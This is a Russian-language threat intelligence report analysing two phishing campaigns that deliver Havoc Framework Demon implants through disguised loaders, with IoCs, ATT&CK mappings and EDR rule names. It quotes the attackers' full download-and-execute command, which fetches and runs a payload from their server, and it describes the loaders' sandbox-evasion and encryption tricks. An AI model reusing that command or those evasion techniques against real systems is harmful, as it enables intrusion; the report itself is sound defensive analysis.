Хаос в киберпространстве: группировки экспериментируют с инструментами
кибербезопасности
В последние месяцы злоумышленники все чаще применяют фреймворк постэксплуатации Havoc. Это менее популярный инструмент по сравнению с такими программами, как Cobalt Strike, Metasploit, Sliver. По мнению специалистов BI.ZONE Threat Intelligence, группировки пытаются обойти системы кибербезопасности, которые могут не определять активность малоизвестного ПО как вредоносную. Например, так же действовал кластер Mysterious Werewolf, используя в одной из кампаний фреймворк Mythic.
В этом исследовании рассмотрим несколько кампаний, зафиксированных специалистами управления киберразведки BI.ZONE, в которых злоумышленники применяли Havoc Framework.
- Злоумышленники продолжают искать альтернативу вредоносному программному обеспечению, нередко прибегая к использованию фреймворков постэксплуатации.
- Использование атакующими менее популярных инструментов повышает вероятность успешного обхода имеющихся средств защиты.
- Благодаря ширине поверхности атаки фишинговые электронные письма остаются наиболее популярным средством получения первоначального доступа.
В июле 2024 года специалисты BI.ZONE Threat Intelligence обнаружили архив Выписка амбулаторная Камильская.zip, содержащий ISO-файл Документы Камильская.iso, внутри которого находился LNK-файл Камильская А. Г.lnk. Открытие жертвой LNK-файла приводило к выполнению следующей команды:
cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe
Указанная команда реализовывала следующие действия:
- загрузку отвлекающего документа с помощью cURL с сервера
87.242.107[.]147и его сохранение в скомпрометированной системе с именемC:\Users\Public\Documents\Vipiska.doc; - загрузку исполняемого файла
OneDriveUpdater.exeс помощью cURL с сервера87.242.107[.]147и его сохранение в скомпрометированной системе с именемC:\Users\Public\Downloads\OneDriveUpdater.exe; - запуск загруженного
OneDriveUpdater.exe; - открытие отвлекающего документа
Vipiska.doc; - завершение процесса
cmd.exeс помощьюtaskkill.
Документ представляет собой выписку из карты амбулаторного больного (рис. 1).
Рис. 1. Фрагмент отвлекающего документа
OneDriveUpdater.exe является исполняемым файлом формата PE32, реализованным на C#, и представляет собой загрузчик. Файл содержит зашифрованную нагрузку, которую он расшифровывает и запускает в памяти. Несмотря на то что OneDriveUpdater.exe имеет иконку приложения Microsoft OneDrive, у него отсутствует цифровая подпись.
Для подготовки и запуска вредоносной нагрузки в загрузчике используются следующие WinAPI-функции:
VirtualAllocExNuma— выделение памяти для размещения вредоносной нагрузки.VirtualProtect— установка/изменение атрибутов защиты для регионов памяти.CreateThread— создание потока для выполнения в контексте текущего процесса.
Для затруднения анализа в загрузчике предусмотрены проверки:
- длительности выполнения кода: если программа «проспала» менее 2,5 секунды из предусмотренных 3 секунд, то работа вредоносной программы завершается;
- имени текущего процесса: если имя текущего процесса не
OneDriveUpdater, то работа вредоносной программы завершается.
Загрузчик содержит два варианта вредоносной нагрузки в зашифрованном виде: x86 и x64. Для расшифровки используется двойной XOR с 32-байтными ключами.
Вредоносная нагрузка представляет собой шелл-код, который запускает динамически подключаемую библиотеку с оригинальным названием demon.x86.dll/demon.x64.dll. Библиотека представляет собой имплант Demon фреймворка The Havoc Framework. Конфигурационные данные импланта представлены в табл. 1.
| Процесс, в который будет внедрена вредоносная нагрузка |
x86: "C:\Windows\SysWOW64\svchost.exe"x64: "C:\Windows\System32\svchost.exe" |
| Командный сервер |
87.242.107[.]147:443 |
| Способ взаимодействия с сервером |
POST
|
| Заголовки |
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"Content-type: */*Host: microsoftonline[.]com |
Также был обнаружен схожий образец загрузчика OneDriveUpdater.exe (SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569) с идентичным PDB-путем, который также содержал имплант Demon фреймворка The Havoc Framework. При этом в качестве командного сервера использовался 87.242.107[.]224.
Анализ командных серверов злоумышленников позволил выявить дополнительные вредоносные файлы, а также ранее неизвестные элементы их инфраструктуры — связанные индикаторы компрометации доступны на портале BI.ZONE Threat Intelligence. В частности, был обнаружен еще один отвлекающий документ — в этот раз с именем Medical.doc — который представлял собой практически точную копию документа Vipiska.doc (рис. 2), что указывает на факт создания данных файлов злоумышленниками.
Рис. 2. Сравнение обнаруженных документов
Анализ метаданных позволил предположить, что источник документа — один из медицинских исследовательских центров.
В августе 2024 года специалисты BI.ZONE Threat Intelligence обнаружили фишинговое письмо (рис. 3).
Рис. 3. Фишинговое письмо
Ссылка в тексте электронного письма ведет на hxxp://inforussia[.]org/dokumenty.html, который содержит внедренную вредоносную нагрузку в закодированном виде (Base64 и сложение с константой 35) (рис. 4).
Рис. 4. Фрагмент HTML-страницы
В результате вредоносная нагрузка сохраняется в скомпрометированной системе под именем Dokumenty_FSB.exe. Это исполняемый файл формата PE32+, реализованный на C/C++, имеет иконку PDF-файла и представляет собой загрузчик. Данный загрузчик содержит в ресурсах RCData вредоносную нагрузку, закодированную в виде IPv6-адресов, разделенных символами 0D 0A, и зашифрованную алгоритмом XOR с ключом длиной 10 000 байт. Загрузчик декодирует и расшифровывает в памяти вредоносную нагрузку, после чего запускает ее через нить потока.
Как и в предыдущей кампании, вредоносная нагрузка представляет собой шелл-код, который запускает динамически подключаемую библиотеку с оригинальным названием demon.x86.dll/demon.x64.dll. Библиотека представляет собой имплант Demon фреймворка The Havoc Framework. Конфигурационные данные импланта представлены в табл. 2.
| Процесс, в который будет внедрена вредоносная нагрузка |
x86: "C:\Windows\SysWOW64\notepad.exe"x64: "C:\Windows\System32\notepad.exe" |
| Командный сервер |
46.29.162[.]93:443 |
| Способ взаимодействия с сервером |
POST
|
| Заголовки |
User-Agent: "Mozilla/5.0 (Windows NT 10) AppleWebKit/432.36 (KHTML, like Gecko)"Content-type: */* |
Выписка амбулаторная Камильская.zip
- MD5:
d970b9e0f46675098dbdd3082565c1c0 - SHA-1:
7388f62e8da9cdbcac4f5bc6b0dc41ff8f0056a9 - SHA-256:
88f83a7394c61b0e05432572ccbbacd1878dad0602c5459f98f46c265e63d8c7
Документы Камильская.iso
- MD5:
3273fb8b07627d8bf5aa4d45aa817ba5 - SHA-1:
14a8c1f7dd2ec5ac1faa8050acbb2fcdf7b8ac8c - SHA-256:
07ae355ebfafe21d81592b765053c48cf4a079d71b359b6a4d7f412b1dfb6374
Камильская А. Г.lnk
- MD5:
ac043785536df294f73f89040d4fc767 - SHA-1:
f0f6947cca25f01eda399a7fba1c23e11a0c3a15 - SHA-256:
48a579e8e48938f810fd6568e0d5c8ed6b3ec093f3c76a67f9c494224962a334
OneDriveUpdater.exe
- MD5:
31113f00145ab7d3773884f091407bed - SHA-1:
061d2d06ce1cabde79ee392645c3568df36fdf17 - SHA-256:
189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569
OneDriveUpdater.exe
- MD5:
14fa89384daab27b998d53efc1750a38 - SHA-1:
7f7313d8e9d18823a57ac7a329b9695f6fa7b962 - SHA-256:
7e3928a7f3300aedf261db5596cb7f2f6aac115240b010e25a3d53decde38fd0
dokumenty.html
- MD5:
8a21fe665d3f3a0e44f21e3381da067c - SHA-1:
ad6f413709c9e3af885233822a1aebd779bba7bc - SHA-256:
7c2f59d9790b816cb6f27a796d7c928046519f7429b7d2bbe53c60a7a55e22a7
Dokumenty_FSB.exe
- MD5:
f43dd2463e238ec7af4c63df87db6c73 - SHA-1:
bb92e0ca7eda4b866af872a4552e4df42bb28aba - SHA-256:
ac301b7698ac040f219eb8dfb248595a406b075d91f51116ef60d4dd9f5242ad
hxxp://inforussia[.]org
87.242.107[.]147
87.242.107[.]224
46.29.162[.]93
Кампания № 1
| Тактика | Техника | Процедура |
|---|---|---|
| Execution |
Command and Scripting Interpreter: PowerShell |
Атакующие используют вредоносные PowerShell‑скрипты для выполнения в памяти текущего процесса вредоносной полезной нагрузки |
|
Command and Scripting Interpreter: Windows Command Shell |
Атакующие используют |
|
|
User Execution: Malicious File |
Атакующие используют вредоносный LNK‑файл в ISO‑архиве для компрометации пользователя |
|
| Defense Evasion |
Debugger Evasion |
Атакующие используют в загрузчике проверку имени запущенного текущего процесса. Если имя отлично от |
|
Deobfuscate/Decode Files or Information |
Атакующие используют вредоносную нагрузку, зашифрованную двойным XOR, которая расшифровывается загрузчиками |
|
|
Obfuscated Files or Information: Embedded Payloads |
Атакующие размещают обфусцированную полезную нагрузку в загрузчиках |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Атакующие шифруют полезную нагрузку двойным XOR и размещают в теле загрузчиков |
|
|
Masquerading: Match Legitimate Name or Location |
Атакующие используют имя |
|
|
Reflective Code Loading |
Атакующие используют рефлективную загрузку вредоносной нагрузки |
|
|
Virtualization/Sandbox Evasion: Time Based Evasion |
Атакующие используют проверку времени выполнения кода |
|
| Discovery |
Process Discovery |
Атакующие получают имя текущего процесса для последующей проверки |
|
Virtualization/Sandbox Evasion: Time Based Evasion |
Атакующие используют проверку времени выполнения кода |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Атакующие используют POST‑запросы в качестве способа коммуникации импланта‑загрузчика Demon с командным сервером |
|
Ingress Tool Transfer |
Атакующие используют cURL для загрузки вредоносной нагрузки и документа‑приманки с сервера |
Кампания № 2
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Link |
Атакующие рассылают целевые фишинговые письма, содержащие ссылку для загрузки вредоносной программы |
| Execution |
Command and Scripting Interpreter: JavaScript |
Атакующие используют вредоносный обфусцированный JS‑код, размещенный на HTML‑странице сервера атакующих |
|
User Execution: Malicious Link |
Атакующие используют вредоносные ссылки для загрузки и запуска вредоносной программы пользователем |
|
|
User Execution: Malicious File |
Атакующие используют EXE‑файлы с иконкой PDF‑документа Adobe Acrobat Reader для компрометации пользователя |
|
| Defense Evasion |
Debugger Evasion |
Атакующие используют в загрузчике проверку имени запускаемого исполняемого файла. Если имя отлично от |
|
Deobfuscate/Decode Files or Information |
Атакующие используют закодированную вредоносную нагрузку в виде IPv6‑адресов, разделенных символами |
|
|
Obfuscated Files or Information: HTML Smuggling |
Атакующие внедряют в HTML‑страницы закодированную вредоносную нагрузку, являющуюся исполняемым файлом |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
Атакующие используют собственный алгоритм хеширования имен вызываемых WinAPI‑функций |
|
|
Obfuscated Files or Information: Embedded Payloads |
Атакующие размещают обфусцированную вредоносную нагрузку в загрузчиках |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Атакующие шифруют вредоносную нагрузку посредством XOR и кодируют ее в виде IPv6‑адресов, разделенных символами |
|
|
Masquerading: Match Legitimate Name or Location |
Атакующие используют имя |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Атакующие используют POST‑запросы в качестве способа коммуникации импланта‑загрузчика Demon с командным сервером |
|
Ingress Tool Transfer |
Атакующие используют имплант Demon фреймворка Havoc, являющийся загрузчиком следующей стадии |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE EDR:
win_access_to_ti_observed_host_from_nonbrowserswin_execution_of_ti_observed_filewin_curl_download_and_execute_filewin_kill_cmd_processwin_suspicious_code_injection_to_system_processwin_possible_parent_process_spoofing
Фишинговые рассылки — самый популярный способ проникновения в периметр организации. Защититься от них помогут сервисы для фильтрации нежелательных писем. Одно из таких решений — BI.ZONE CESP. К каждому электронному сообщению оно применяет более 600 механизмов фильтрации, используя технологии машинного обучения и разные виды анализа: статистический, сигнатурный, эвристический. Такая проверка избавляет компанию от проблемы нежелательных писем, при этом не задерживая доставку легитимной почты.
Изучение современных методов и инструментов злоумышленников важно для построения ландшафта киберугроз. Чтобы быть в курсе новых кампаний и особенностей атак на конкретные инфраструктуры, мы рекомендуем пользоваться порталами киберразведки, например BI.ZONE Threat Intelligence. Он предоставляет информацию об актуальных атаках, злоумышленниках, их методах и инструментах. Эти данные помогают обеспечить эффективную работу СЗИ, ускорить реагирование на инциденты и защититься от наиболее критичных для компании угроз.